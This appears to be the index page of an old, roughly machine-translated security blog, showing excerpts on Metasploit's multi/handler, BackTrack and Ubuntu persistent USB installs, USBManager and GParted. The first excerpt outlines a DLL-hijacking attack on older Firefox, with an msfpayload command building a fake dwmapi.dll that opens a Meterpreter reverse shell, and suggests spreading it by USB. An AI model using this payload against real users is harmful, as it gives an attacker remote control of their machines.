ClsHack:Computer Security Blog    

[Metasploit] multi/handler :D

Monday, August 30th, 2010

Using this option Metasploit, we can keep listening to the Metasploit client does not connect to our server.

In a nutshell, se mandiamo exploit in giro (for example via USB) metasploit, listens to the user executes it…

Let's see how to attack firefox < = 3.6.8 con il DLL Hijacking e multi / handler in metasploit.

[info DLL Hijacking]

The dll that loads firefox execution, is:
dwmapi.dll


We create the false dll:
sudo ./msfpayload windows/meterpreter/reverse_tcp LHOST=IP D > dwmapi.dll
(more…)

[Install]BackTrack USB Persistent Mode

Tuesday, July 27th, 2010

Let's see how to install backtrack in persistent mode on a usb stick :D

Required Software:
UNetbootin:Installing Linux distributions easily on USB.
And a partitioner :D if you're handy terminal otherwise you can more easily use gparted.

Now partizioniamo our pen, (advice from a 4 GB).
Create a partition fat32 of 1.8 GB and call it as we wish ;)
We create another partition, the remaining space in ext3 and call: casper-rw
(more…)

USBManager: Easily manage USB devices on Ubuntu / Linux

Sunday, March 7th, 2010

USBManager is a small, useful and free application written in python that helps us manage the USB devices that are connected to our linux.

Thanks to USBManager we can identify each device, view the details of it, mount and smontarlo, change label, format :D .

Of course, these things you could already do on linux, umm but not all remember the commands to memory.
(more…)

Install Ubuntu and derivatives PersistentMode on USB with UNetbootin

Saturday, November 28th, 2009

Not long ago we saw, how to install a linux distribution live in a usb stick, in a simple and fast.

Article, can be found here:

UNetbootin:Installing Linux distributions easily on USB.

Using, always the same program, available for GN / Linux and Windows and we can install ubuntu on derivatives(anche backtrack :) ) in a simple and fast, but in persistent mode.(that is, the modifications you make to the system are stored.)

(more…)

Partition with GParted:Free alternative to PartitionMagic

Friday, November 13th, 2009

GParted, is a excellent, if not best alternative FREE a PartitionMagic.

GParted it uses the graphics libraries GTK and runs on a GNU / Linux.

GParted, Once burned Live CD or installed with unetbootinin USB software becomes an important screwed proficient from any PC.

(more…)